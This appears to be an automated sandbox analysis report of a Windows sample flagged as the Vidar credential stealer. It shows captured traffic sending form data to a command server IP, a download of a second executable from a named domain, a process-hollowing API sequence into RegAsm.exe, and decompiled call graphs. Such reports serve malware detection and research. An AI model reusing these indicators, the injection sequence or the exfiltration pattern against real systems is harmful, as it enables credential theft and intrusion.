2024-09-26 17:06:01 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBKJDGCGDAAAKECAKKJD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 98097
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:06:01 UTC | 16355 | OUT | Data Ascii: ------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------FBKJDGCGDAAAKECAKKJDCont
2024-09-26 17:06:02 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:06:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-26 17:06:02 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49738 | 5.75.211.162 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:06:03 UTC | 277 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-26 17:06:03 UTC | 331 | OUT | Data Ascii: ------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------AAKKFHCFIECAAAKEGCFICont
2024-09-26 17:06:04 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 26 Sep 2024 17:06:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49739 | 172.105.54.160 | 443 | 6508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-26 17:06:05 UTC | 171 | OUT | GET /ljhgfsd.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: dbsmena.com
Cache-Control: no-cache
2024-09-26 17:06:06 UTC | 284 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 17:06:05 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Thu, 26 Sep 2024 16:59:48 GMT
ETag: "c218c-5e028-62308aa93ecb1"
Accept-Ranges: bytes
Content-Length: 385064
Content-Type: application/x-msdownload
                                                                                                      Data Ascii: )gDq1y#`P<%J@&0sS`3C|F0S|w7'nY&zUH=ZG|g=xk`h9eblA^F/vtRWzMd%x_v#FQ*n"KWc ]'k9$@8p*.t;"N]`[H*3y
                                                                                                      2024-09-26 17:06:06 UTC8000INData Raw: fc 9b cf 45 f9 61 e3 65 71 bb 52 77 76 f9 01 61 ee 6c cd 55 03 42 b2 92 41 d5 40 03 3b fd a7 8d db df 78 0d 90 2e 78 b9 57 34 64 76 f1 01 aa cf b5 6e ca f8 6f 25 1f 2a d4 72 fb 3d 73 73 e3 97 e0 c2 76 a4 39 f8 54 6f fe 9b 90 3c 0e ec 80 86 fb cb fd 59 6c c9 13 88 d2 a4 66 46 1c c9 52 4c 2e e2 ec 14 0b 41 30 61 3e 98 e2 1d a2 9e b3 80 5b cb df 71 9e 15 c2 d0 08 7c 73 d6 65 14 4f 18 32 5e f9 80 d5 9c 30 88 f2 9e d0 17 4e 99 e7 ca 82 21 dd b1 5c 07 0b c7 dc 19 3f 0f e8 43 c4 cd 96 27 fe 39 59 a2 4e 0d b7 f5 d5 1e 12 49 af f9 e3 d1 e7 1e 68 4a ea 16 47 ba 78 9e c0 e1 46 48 29 6b ac c9 29 40 44 68 6c 40 12 41 f0 db 27 15 a8 b2 0a 56 f9 f6 64 a8 a3 40 c3 16 25 8c 9a 8c 89 ee 0d 10 a8 40 f8 30 9f 71 fb 47 2b bb ca a1 ce b2 aa 46 bc b7 35 85 6b bd 54 8b 8b d9 c9
                                                                                                      Data Ascii: EaeqRwvalUBA@;x.xW4dvno%*r=ssv9To<YlfFRL.A0a>[q|seO2^0N!\?C'9YNIhJGxFH)k)@Dhl@A'Vd@%@0qG+F5kT
                                                                                                      2024-09-26 17:06:06 UTC8000INData Raw: 4f d2 b1 20 a6 2b ff 92 3e ed d9 5c 12 82 65 d5 20 04 cf 4c 41 62 74 b9 2f c5 8f 60 78 f5 d3 76 cd 3e 1c 42 c9 50 f0 07 55 5b e5 70 c1 aa f1 be c7 58 d8 70 14 e1 b9 bd c9 ca e1 52 f3 a7 0c 8e 69 9e cd d8 ed fa 0f 90 57 ec 80 9c 44 57 df ea e7 70 4d d4 27 b0 9b 62 7e 0e ff e5 2c 65 0f 5c d7 bf c7 2a 9b 09 7b 72 0c 9b fe b1 ef 88 05 e1 9d 66 1e 8d cc 9a 4d 93 bb 36 ba 70 31 3c 66 2e e5 46 1d f5 0b eb b2 0c 30 8e 6b e5 37 14 20 6a d9 1d 3a 92 1e 24 d7 b7 33 e3 9d a1 32 1d fd 69 4a c6 07 9f ca bb 17 d8 97 26 e5 cb 1e 18 42 f3 0b cc 5f 89 14 b5 62 99 54 09 5d 0f 66 77 1e 5d 37 d3 99 42 84 49 e2 45 56 1e 63 c0 77 3c ce d1 9d 4a 28 3d b2 35 72 38 e9 ab 3e 5c ee 95 cb df 16 75 4d 1d 42 77 8a 94 fe 42 0d bc df bc 91 6f 0a b5 c7 1d 44 05 fd 00 64 9f 87 00 eb a3 db
                                                                                                      Data Ascii: O +>\e LAbt/`xv>BPU[pXpRiWDWpM'b~,e\*{rfM6p1<f.F0k7 j:$32iJ&B_bT]fw]7BIEVcw<J(=5r8>\uMBwBoDd
                                                                                                      2024-09-26 17:06:07 UTC8000INData Raw: 84 df 03 6a b4 83 3c a2 8d 9f df 03 18 76 b5 b3 73 92 1c 49 a7 e0 f4 74 89 d5 b1 90 26 ab 47 40 4a 37 13 54 81 f2 79 82 ec f5 26 2e e0 a3 d2 a1 b0 43 e0 d0 31 d3 4f e0 56 5d fd 6a f1 51 d9 fd e7 70 e9 28 5d 93 bb 56 ae c4 d7 bf 72 00 73 39 5d 00 76 f2 e9 19 b2 b1 fe d2 c6 01 68 4e 4b d1 99 8c e4 2e 73 01 93 e6 21 e8 97 ef 61 42 97 67 fd 4e c0 fc e0 ea 07 2c 28 60 15 58 b4 a9 fe 6e c1 4c 75 5a 72 75 c4 39 ec 40 61 6b 4a 79 51 43 1c 75 5d d0 dc ae 9d 1c 13 b2 f8 57 10 24 ab 33 5f 36 03 c7 e4 f9 2c 8d 0f d8 37 8f 1f ba fc 92 85 86 a1 83 8a ea 38 9b a3 52 1f db fd 32 c7 57 c9 c3 63 e4 81 2a 0c de e8 d4 bd 53 f1 eb 09 56 a6 0f 51 79 03 13 e3 46 2d 5f 16 a8 0a e1 bc 7d 83 db 29 a1 fa 77 1a 84 fc c7 b8 a8 0b 6b c1 6f 51 13 f0 24 62 6c 31 fe d9 41 d1 de e7 ea 0d
                                                                                                      Data Ascii: j<vsIt&G@J7Ty&.C1OV]jQp(]Vrs9]vhNK.s!aBgN,(`XnLuZru9@akJyQCu]W$3_6,78R2Wc*SVQyF-_})wkoQ$bl1A
                                                                                                      2024-09-26 17:06:07 UTC8000INData Raw: 98 88 95 12 39 83 a7 08 39 97 43 6f e4 c5 55 c9 0c ee 6f 08 19 a6 1c 65 c7 6d 29 73 ce 02 ed 72 21 15 cd e2 dd e2 9c 1d 77 5d 0b b5 4b f0 4c 7a 79 8f ea ce ad a1 ca 06 94 58 02 a4 1f 36 e1 2d 98 73 71 6a bd f4 07 63 ab 1f 96 1b 4d c4 13 f4 25 24 4b a9 d2 c7 e6 17 17 72 e5 d5 1e a3 0e d8 83 19 46 08 2f 1d 3e ab fa c2 12 5d 84 dc 7b 6c 09 cc e8 57 0e 5d 17 4a 74 68 8e 99 93 6d b8 36 cf 52 54 3f cc d4 16 f9 31 e2 d5 29 06 30 2f 77 35 36 80 9b 23 e9 8e 72 8b 27 d8 75 f3 17 bd b5 0a 3a f9 eb c2 c7 8b 6f 6b 57 42 6e 6e 23 d5 bc 35 5c 6a 30 23 0b 6a df 2e 64 76 54 35 15 e4 c4 83 89 be af 4b 42 64 49 83 02 e3 7c 8c 42 f2 4e 37 10 71 5b db 0e 89 3a 84 ce 84 c5 3f 0f a9 57 b5 f4 db f3 8a 5f e2 60 5b 39 74 d7 61 e3 ff 4f a5 35 fb 5a b7 82 2d 09 3f 88 93 e8 da 4d 87
                                                                                                      Data Ascii: 99CoUoem)sr!w]KLzyX6-sqjcM%$KrF/>]{lW]Jthm6RT?1)0/w56#r'u:okWBnn#5\j0#j.dvT5KBdI|BN7q[:?W_`[9taO5Z-?M
                                                                                                      2024-09-26 17:06:07 UTC8000INData Raw: 1a 06 41 2d 9f a0 a9 d8 6d cc d1 be 4a 46 7b 32 c2 98 39 d3 d1 00 02 a7 6b ed 0f 4a c5 cb d5 af 51 d2 6e 1e ba af 46 9b 31 4f ba ca 45 60 a2 08 f9 79 ba 8a 67 19 f6 40 42 68 83 da b4 cd d5 9b 0c ff eb cf d4 ce ad 88 26 a0 bd 98 31 b7 1d 57 b7 25 74 06 d4 3f 08 e6 6f 1c af 38 03 a4 14 59 43 cd 3b 2f 60 d9 80 c8 27 f3 99 b0 02 9f 3c af e0 8b 97 29 92 eb 29 b3 54 52 30 87 e8 ea 13 5f de 19 aa a5 9c 3b d7 82 b6 49 80 67 76 79 66 ad d2 69 d5 0e 8b ed 00 f7 55 6c ce 7d f3 9a 11 5f 38 06 9d 04 e0 aa 7c b5 48 3d 51 05 fc a3 43 a2 2e 98 99 80 07 3a a3 b8 63 df be 39 64 7e 1e 75 32 03 29 16 79 4c 1b ef 3d eb a1 c7 1f da e7 02 0f f5 71 c9 93 2d 52 50 b1 00 bd 83 25 c3 75 72 8b 38 be 60 ed 71 c8 99 1f 35 00 df 27 b1 b0 d2 ee dc aa e8 16 20 3a 40 45 8d 59 d3 32 9b b8
                                                                                                      Data Ascii: A-mJF{29kJQnF1OE`yg@Bh&1W%t?o8YC;/`'<))TR0_;IgvyfiUl}_8|H=QC.:c9d~u2)yL=q-RP%ur8`q5' :@EY2



                                                                                                      Target ID:0
                                                                                                      Start time:13:05:04
                                                                                                      Start date:26/09/2024
                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                      Imagebase:0xbb0000
                                                                                                      File size:413'224 bytes
                                                                                                      MD5 hash:2CCE29D734EA1D227B338834698E2DE4
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:13:05:04
                                                                                                      Start date:26/09/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:13:05:04
                                                                                                      Start date:26/09/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                      Imagebase:0xd80000
                                                                                                      File size:65'440 bytes
                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:false


                                                                                                        Execution Graph

                                                                                                        Execution Coverage:35.7%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:33.3%
                                                                                                        Total number of Nodes:21
                                                                                                        Total number of Limit Nodes:0
                                                                                                        execution_graph 456 1240988 457 124099e 456->457 458 1240abb 457->458 461 1241220 457->461 465 1241218 457->465 462 124126b VirtualProtectEx 461->462 464 12412af 462->464 464->458 466 124126b VirtualProtectEx 465->466 468 12412af 466->468 468->458 476 1240978 477 124099e 476->477 478 1240abb 477->478 479 1241220 VirtualProtectEx 477->479 480 1241218 VirtualProtectEx 477->480 479->478 480->478 469 2fe2131 470 2fe2169 469->470 470->470 471 2fe2277 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 470->471 471->470 472 2fe2346 WriteProcessMemory 471->472 473 2fe238b 472->473 474 2fe23cd WriteProcessMemory Wow64SetThreadContext ResumeThread 473->474 475 2fe2390 WriteProcessMemory 473->475 475->473


                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02FE20A3,02FE2093), ref: 02FE22A0
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02FE22B3
                                                                                                        • Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 02FE22D1
                                                                                                        • ReadProcessMemory.KERNELBASE(0000008C,?,02FE20E7,00000004,00000000), ref: 02FE22F5
                                                                                                        • VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 02FE2320
                                                                                                        • WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 02FE2378
                                                                                                        • WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 02FE23C3
                                                                                                        • WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 02FE2401
                                                                                                        • Wow64SetThreadContext.KERNEL32(00000098,02E80000), ref: 02FE243D
                                                                                                        • ResumeThread.KERNELBASE(00000098), ref: 02FE244C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2058561662.0000000002FE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2fe1000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                        • API String ID: 2687962208-1257834847
                                                                                                        • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                        • Instruction ID: 9307c95a53ebb09c2fc5129678f9f70d69314f496a2ccf48796e7242b2a88b92
                                                                                                        • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                        • Instruction Fuzzy Hash: 94B1D67664024AAFDB60CF68CC80BDA77A9FF88754F158524EA08AB341D774FA418B94

                                                                                                        Control-flow Graph

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2058185728.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1240000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8758e7de542619cbb0508c14e4eebf07e790723f3f0cb779fa62cb89b692f7e1
                                                                                                        • Instruction ID: 56b1851b32229aa6e95b210ba5c175c94082333ab98acfea80777101e796a6de
                                                                                                        • Opcode Fuzzy Hash: 8758e7de542619cbb0508c14e4eebf07e790723f3f0cb779fa62cb89b692f7e1
                                                                                                        • Instruction Fuzzy Hash: 63D1B070A142598FCB1ACFA8C480AEDFBF2BF58314F288569E555E7256C734AC81CF94

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 23 1241218-12412ad VirtualProtectEx 26 12412b4-12412d5 23->26 27 12412af 23->27 27->26
                                                                                                        APIs
                                                                                                        • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 012412A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2058185728.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1240000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-0
                                                                                                        • Opcode ID: 33928debe9a39c8c85fb1d94b26b68cc6540af9f5d109dab6635d6ebc326c088
                                                                                                        • Instruction ID: fc2b5201724ab9d246a3005d36b328344fddda30f950accbe42c7076fae9a79f
                                                                                                        • Opcode Fuzzy Hash: 33928debe9a39c8c85fb1d94b26b68cc6540af9f5d109dab6635d6ebc326c088
                                                                                                        • Instruction Fuzzy Hash: EE2134B1D102599FCB14CFAAD880AEEBBF4FF88320F10842EE919A3250C7355944CFA1

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 30 1241220-12412ad VirtualProtectEx 33 12412b4-12412d5 30->33 34 12412af 30->34 34->33
                                                                                                        APIs
                                                                                                        • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 012412A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2058185728.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1240000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-0
                                                                                                        • Opcode ID: d569836423ed95d5f6ef2142db1c2566a7e4ea3240f599664170c4e6f85b0937
                                                                                                        • Instruction ID: 890c0ec022fd4193041f33c27c31501420ea6a259d95a50d1ff92a09f931f4a8
                                                                                                        • Opcode Fuzzy Hash: d569836423ed95d5f6ef2142db1c2566a7e4ea3240f599664170c4e6f85b0937
                                                                                                        • Instruction Fuzzy Hash: 492113B1D002599FDB10DFAAC980ADEFBF4FF48310F10842AE919A3250C7756940DBA1

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:4.3%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:3.8%
                                                                                                        Total number of Nodes:2000
                                                                                                        Total number of Limit Nodes:30
79773->79774 79775 4047e8 3 API calls 79774->79775 79776 404586 79775->79776 79777 4047e8 3 API calls 79776->79777 79778 40459d 79777->79778 79779 4047e8 3 API calls 79778->79779 79780 4045b4 79779->79780 79781 4047e8 3 API calls 79780->79781 79782 4045cb 79781->79782 79783 4047e8 3 API calls 79782->79783 79784 4045e2 79783->79784 79785 4047e8 3 API calls 79784->79785 79786 4045f9 79785->79786 79787 4047e8 3 API calls 79786->79787 79788 404612 79787->79788 79789 4047e8 3 API calls 79788->79789 79790 404629 79789->79790 79791 4047e8 3 API calls 79790->79791 79792 404642 79791->79792 79793 4047e8 3 API calls 79792->79793 79794 404656 79793->79794 79795 4047e8 3 API calls 79794->79795 79796 40466d 79795->79796 79797 4047e8 3 API calls 79796->79797 79798 404684 79797->79798 79799 4047e8 3 API calls 79798->79799 79800 40469b 79799->79800 79801 4047e8 3 API calls 79800->79801 79802 4046b2 79801->79802 79803 4047e8 3 API calls 79802->79803 79804 4046cc 79803->79804 79805 4047e8 3 API calls 79804->79805 79806 4046e3 79805->79806 79807 4047e8 3 API calls 79806->79807 79808 4046f9 79807->79808 79809 4047e8 3 API calls 79808->79809 79810 404710 79809->79810 79811 4047e8 3 API calls 79810->79811 79812 404727 79811->79812 79813 4047e8 3 API calls 79812->79813 79814 40473d 79813->79814 79815 4047e8 3 API calls 79814->79815 79816 404754 79815->79816 79817 4047e8 3 API calls 79816->79817 79818 404768 79817->79818 79819 4047e8 3 API calls 79818->79819 79820 404781 79819->79820 79821 4047e8 3 API calls 79820->79821 79822 404797 79821->79822 79823 4047e8 3 API calls 79822->79823 79824 4047ae 79823->79824 79825 4047e8 3 API calls 79824->79825 79826 4047c5 79825->79826 79827 4047e8 3 API calls 79826->79827 79828 4047dc 79827->79828 79828->78836 81148 42f109 79829->81148 79831 41258e CreateToolhelp32Snapshot Process32First 79832 4125c2 Process32Next 79831->79832 79833 4125ef CloseHandle 79831->79833 79832->79833 79834 4125d4 StrCmpCA 79832->79834 81149 42f165 79833->81149 79834->79832 
79836 4125e6 79834->79836 79836->79832 79839 4104e7 lstrcpyA 79838->79839 79840 411c67 79839->79840 79841 4104e7 lstrcpyA 79840->79841 79842 411c75 GetSystemTime 79841->79842 79843 411c91 79842->79843 79844 41d016 __setmbcp_nolock 5 API calls 79843->79844 79845 411cc8 79844->79845 79845->78843 79848 4105e1 79846->79848 79847 410605 79847->78858 79848->79847 79849 4105f3 lstrcpyA lstrcatA 79848->79849 79849->79847 79851 410519 lstrcpyA 79850->79851 79852 401d07 79851->79852 79853 410519 lstrcpyA 79852->79853 79854 401d12 79853->79854 79855 410519 lstrcpyA 79854->79855 79856 401d1d 79855->79856 79857 410519 lstrcpyA 79856->79857 79858 401d34 79857->79858 79859 4169b6 79858->79859 79860 410549 2 API calls 79859->79860 79861 4169ec 79860->79861 79862 410549 2 API calls 79861->79862 79863 4169f9 79862->79863 79864 410549 2 API calls 79863->79864 79865 416a06 79864->79865 79866 4104e7 lstrcpyA 79865->79866 79867 416a13 79866->79867 79868 4104e7 lstrcpyA 79867->79868 79869 416a20 79868->79869 79870 4104e7 lstrcpyA 79869->79870 79871 416a2d 79870->79871 79872 4104e7 lstrcpyA 79871->79872 79873 416a3a 79872->79873 79874 4104e7 lstrcpyA 79873->79874 79875 416a47 79874->79875 79876 4104e7 lstrcpyA 79875->79876 79895 416a54 79876->79895 79879 416a98 StrCmpCA 79880 416af1 StrCmpCA 79879->79880 79879->79895 79881 416cd4 79880->79881 79880->79895 79884 41058d lstrcpyA 79881->79884 79885 416cdf 79884->79885 79887 4104e7 lstrcpyA 79885->79887 79888 416cec 79887->79888 79890 41058d lstrcpyA 79888->79890 79889 401cfd lstrcpyA 79889->79895 79894 416c2c 79890->79894 79891 41683e 28 API calls 79891->79895 79892 4168c6 33 API calls 79892->79895 79893 41058d lstrcpyA 79893->79895 79896 4104e7 lstrcpyA 79894->79896 79895->79879 79895->79880 79895->79889 79895->79891 79895->79892 79895->79893 79898 416b51 StrCmpCA 79895->79898 79900 416baa StrCmpCA 79895->79900 79911 410519 lstrcpyA 79895->79911 81152 4029f8 79895->81152 81155 402a09 79895->81155 81158 402a1a 79895->81158 81168 402a2b 
lstrcpyA 79895->81168 81169 402a3c lstrcpyA 79895->81169 81170 402a4d lstrcpyA 79895->81170 79897 416d0b 79896->79897 79899 41058d lstrcpyA 79897->79899 79898->79895 79898->79900 79907 416d15 79899->79907 79901 416bc0 StrCmpCA 79900->79901 79902 416ca3 79900->79902 79905 416c72 79901->79905 79906 416bd6 StrCmpCA 79901->79906 79904 41058d lstrcpyA 79902->79904 79908 416cae 79904->79908 79912 41058d lstrcpyA 79905->79912 79909 416be8 StrCmpCA 79906->79909 79910 416c3e 79906->79910 81161 416da2 79907->81161 79914 4104e7 lstrcpyA 79908->79914 79915 416c0a 79909->79915 79916 416bfa Sleep 79909->79916 79918 41058d lstrcpyA 79910->79918 79911->79895 79917 416c7d 79912->79917 79919 416cbb 79914->79919 79920 41058d lstrcpyA 79915->79920 79916->79895 79921 4104e7 lstrcpyA 79917->79921 79922 416c49 79918->79922 79924 41058d lstrcpyA 79919->79924 79925 416c15 79920->79925 79926 416c8a 79921->79926 79923 4104e7 lstrcpyA 79922->79923 79927 416c56 79923->79927 79924->79894 79928 4104e7 lstrcpyA 79925->79928 79929 41058d lstrcpyA 79926->79929 79930 41058d lstrcpyA 79927->79930 79931 416c22 79928->79931 79929->79894 79930->79894 79932 41058d lstrcpyA 79931->79932 79932->79894 79933 416d28 79933->78869 79935 41058d lstrcpyA 79934->79935 79936 418257 79935->79936 79937 41058d lstrcpyA 79936->79937 79938 418262 79937->79938 79939 41058d lstrcpyA 79938->79939 79940 41826d 79939->79940 79940->78873 79942 410529 79941->79942 79943 41053e 79942->79943 79944 410536 lstrcpyA 79942->79944 79943->78886 79944->79943 79946 4109e6 GetVolumeInformationA 79945->79946 79947 4109df 79945->79947 79948 410a4d 79946->79948 79947->79946 79948->79948 79949 410a62 GetProcessHeap HeapAlloc 79948->79949 79950 410a7d 79949->79950 79951 410a8c wsprintfA lstrcatA 79949->79951 79952 4104e7 lstrcpyA 79950->79952 81171 411684 GetCurrentHwProfileA 79951->81171 79954 410a85 79952->79954 79957 41d016 __setmbcp_nolock 5 API calls 79954->79957 79955 410ac7 lstrlenA 81187 4123d5 lstrcpyA malloc strncpy 79955->81187 
79959 410b2e 79957->79959 79958 410aea lstrcatA 79960 410b01 79958->79960 79959->78913 79961 4104e7 lstrcpyA 79960->79961 79962 410b18 79961->79962 79962->79954 79964 410519 lstrcpyA 79963->79964 79965 404b59 79964->79965 81191 404ab6 79965->81191 79967 404b65 79968 4104e7 lstrcpyA 79967->79968 79969 404b81 79968->79969 79970 4104e7 lstrcpyA 79969->79970 79971 404b91 79970->79971 79972 4104e7 lstrcpyA 79971->79972 79973 404ba1 79972->79973 79974 4104e7 lstrcpyA 79973->79974 79975 404bb1 79974->79975 79976 4104e7 lstrcpyA 79975->79976 79977 404bc1 InternetOpenA StrCmpCA 79976->79977 79978 404bf5 79977->79978 79979 405194 InternetCloseHandle 79978->79979 79980 411c4a 7 API calls 79978->79980 79990 4051e1 79979->79990 79981 404c15 79980->79981 79982 4105c7 2 API calls 79981->79982 79983 404c28 79982->79983 79984 41058d lstrcpyA 79983->79984 79985 404c33 79984->79985 79986 410609 3 API calls 79985->79986 79987 404c5f 79986->79987 79988 41058d lstrcpyA 79987->79988 79989 404c6a 79988->79989 79991 410609 3 API calls 79989->79991 79992 41d016 __setmbcp_nolock 5 API calls 79990->79992 79993 404c8b 79991->79993 79994 405235 79992->79994 79995 41058d lstrcpyA 79993->79995 80096 4139c2 StrCmpCA 79994->80096 79996 404c96 79995->79996 79997 4105c7 2 API calls 79996->79997 79998 404cb8 79997->79998 79999 41058d lstrcpyA 79998->79999 80000 404cc3 79999->80000 80001 410609 3 API calls 80000->80001 80002 404ce4 80001->80002 80003 41058d lstrcpyA 80002->80003 80004 404cef 80003->80004 80005 410609 3 API calls 80004->80005 80006 404d10 80005->80006 80007 41058d lstrcpyA 80006->80007 80008 404d1b 80007->80008 80009 410609 3 API calls 80008->80009 80010 404d3d 80009->80010 80011 4105c7 2 API calls 80010->80011 80012 404d48 80011->80012 80013 41058d lstrcpyA 80012->80013 80014 404d53 80013->80014 80015 404d69 InternetConnectA 80014->80015 80015->79979 80016 404d97 HttpOpenRequestA 80015->80016 80017 404dd7 80016->80017 80018 405188 InternetCloseHandle 80016->80018 80019 404dfb 
